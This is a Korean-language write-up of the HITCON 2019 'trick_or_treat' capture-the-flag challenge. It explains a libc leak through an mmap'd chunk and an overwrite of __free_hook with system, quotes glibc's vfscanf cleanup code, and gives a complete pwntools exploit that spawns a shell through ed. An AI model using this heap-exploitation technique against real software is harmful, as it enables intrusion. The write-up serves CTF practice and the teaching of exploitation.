2019 hitcon trick_or_treat

hitcon 2019 trick_or_treat

굉장히 간단한 프로그램이다.

 

맨 처음에 입력받은 Size로 malloc을 해주고, 2번의 arbitrary write를 제공해준다.

 

여기서, chunk의 주소를 출력해주니 mmap으로 chunk를 할당받아서 libc를 leak할 수 있다.

 

그 후, __free_hook을 system으로 덮고, system("ed")를 실행시켜주면 된다.

 

scanf에 큰 입력을 주면 malloc 후 입력을 chunk에 담고 free시키는데, 예를 들어 "A"를 0x500개, ed를 넣으면 chunk는 다음과 같은 형태를 갖는다.

 

 

free 코드는 vfscanf의 errout LABEL이다.

 

 errout:
  /* Unlock stream.  */
  UNLOCK_STREAM (s);
  scratch_buffer_free (&charbuf.scratch);
  if (__glibc_unlikely (done == EOF))
    {
      if (__glibc_unlikely (ptrs_to_free != NULL))
        {
          struct ptrs_to_free *p = ptrs_to_free;
          while (p != NULL)
            {
              for (size_t cnt = 0; cnt < p->count; ++cnt)
                {
                  free (*p->ptrs[cnt]);
                  *p->ptrs[cnt] = NULL;
                }
              p = p->next;
              ptrs_to_free = p;
            }
        }
    }
  else if (__glibc_unlikely (strptr != NULL))
    {
      free (*strptr);
      *strptr = NULL;
    }
  return done;
}

vfscanf-internal.c #3028 ~ #3058

 

from pwn import *
​
#context.log_level= 'debug'
​
e = ELF('trick_or_treat')
s = process(e.path)
l = ELF('/lib/x86_64-linux-gnu/libc.so.6', checksec=False)
#l = ELF('libc.so.6', checksec=False)
​
ru = lambda x: s.recvuntil(x)
sl = lambda x: s.sendline(x)
p = lambda : pause()
io = lambda : s.interactive()
sla = lambda x,y: s.sendlineafter(x,y)
sa = lambda x,y: s.sendafter(x,y)
​
size = 0x100000
sla(':', str(size))
​
ru(':')
leak = int(s.recv(14),16)
log.info('leak: {}'.format(hex(leak)))
l_base = leak - 0x4ff010 + 0x5000
log.info('l_base: {}'.format(hex(l_base)))
one_list = [0x4f2c5, 0x4f322, 0x10a38c]
one = l_base + one_list[0]
f_hook = l_base + l.symbols['__free_hook']
system = l_base + l.symbols['system']
​
target = f_hook
offset = (leak - target)//8
offset = -offset & (2**64-1)
value = system
​
log.info('offset: {}, value: {}'.format(offset, value))
​
sl(hex(offset))
sl(hex(value))
​
dump = '''
0x4f2c5 execve("/bin/sh", rsp+0x40, environ)
constraints:
  rcx == NULL
​
0x4f322 execve("/bin/sh", rsp+0x40, environ)
constraints:
  [rsp+0x40] == NULL
​
0x10a38c execve("/bin/sh", rsp+0x70, environ)
constraints:
  [rsp+0x70] == NULL
'''
​
sl("A"*0x500)
sl("ed")
​
sl("!/bin/sh")
io()